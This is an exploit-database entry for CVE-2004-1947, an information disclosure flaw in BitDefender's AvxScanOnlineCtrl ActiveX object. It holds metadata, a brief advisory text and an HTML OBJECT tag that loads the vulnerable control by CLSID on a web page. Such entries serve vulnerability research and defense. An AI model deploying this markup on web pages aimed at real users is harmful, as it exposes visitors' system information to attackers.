EXPLOITS

Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure

Author: Rafel Ivgi The-Insider
type: remote
platform: windows
port: 
date_added: 2004-04-19  
date_updated: 2013-01-10  
verified: 1  
codes: CVE-2004-1947;OSVDB-5549  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24025.txt  

source: https://www.securityfocus.com/bid/10175/info

Reportedly the BitDefender AvxScanOnlineCtrl COM object is affected by an information disclosure vulnerability. This issue is due to a design error that allows a remote user to execute a method in the offending object that provides access to unauthorized information.

This issue would allow an attacker to gain access system information that may be used to aid in further attacks.

<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>